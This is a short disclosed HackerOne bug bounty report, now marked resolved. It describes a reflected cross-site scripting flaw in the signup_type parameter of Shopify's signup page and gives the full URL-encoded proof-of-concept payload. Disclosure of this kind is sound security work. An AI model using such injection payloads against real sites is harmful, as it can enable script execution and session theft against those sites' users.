XSS https://www.shopify.com/signup

Disclosed: 2015-08-31 22:37:28 By mdv To shopify

Unknown

Vulnerability Details

https://www.shopify.com/signup?signup_type=%27|alert%28%27XSS%27%29|%27 Vulnerable param is signup_type. For the XSS i used '|alert('XSS')|' Tested in Mozilla Firefox 40.0.3

Actions

View on HackerOne

Report Stats

Report ID: 85291
State: Closed
Substate: resolved
Upvotes: 2

XSS https://www.shopify.com/signup

Vulnerability Details

Actions

Report Stats

Share this report